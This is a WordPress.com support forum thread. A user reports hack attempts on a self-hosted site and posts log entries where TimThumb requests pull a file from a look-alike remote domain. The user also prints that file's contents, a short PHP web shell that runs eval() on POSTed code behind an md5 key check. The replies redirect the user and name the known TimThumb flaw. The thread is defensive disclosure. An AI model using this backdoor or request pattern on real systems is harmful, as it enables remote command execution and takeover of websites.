Need help? Check out our Support site, then


WordPress.com Forums » Support

New Hack Attempt on Self Hosted WordPress Site!!

  1. pinchii
    Member

    Got this in my "hack prevention" scripts that I have running on the site

    Remote Address:[removed]
    Remote Port:47762
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    And also

    Remote Address:[removed]
    Remote Port:47764
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    The content of the File "images.php" is

    ::::BINARY CODE PAYLOAD::::
    <?php
    if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
    $cmd = $_POST["code"];
    eval (stripslashes($cmd));
    }
    ?>

    Looks like they are trying to gain CMD on my Apache server

    If you guys are getting the same, I suggest you block PHP files in your wp-content folder

    The blog I need help with is pinchii.com.

  2. supportbot
    Support Bot

    The blog you specified at pinchii.com does not appear to be hosted at WordPress.com.

    This support forum is for blogs hosted at WordPress.com. If your question is about a self-hosted WordPress blog then you'll find help at the WordPress.org forums.

    If you don't understand the difference between WordPress.com and WordPress.org, you may find this information helpful.

    If you forgot to include a link to your blog, you can reply and include it below. It'll help people to answer your question.

    This is an automated message.

  3. timethief
    Member

    You are posting to the wrong support forum. We cannot help you here at WordPress.COM as we run on different software. please post to the correct forum forum your software. It's where the support bot points to http://wordpress.ORG/support/

  4. macmanx
    Happiness Engineer

    This is a well-known vulnerability in the Timthumb script, not WordPress.

    See this for more details: http://ma.tt/2011/08/the-timthumb-saga/

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags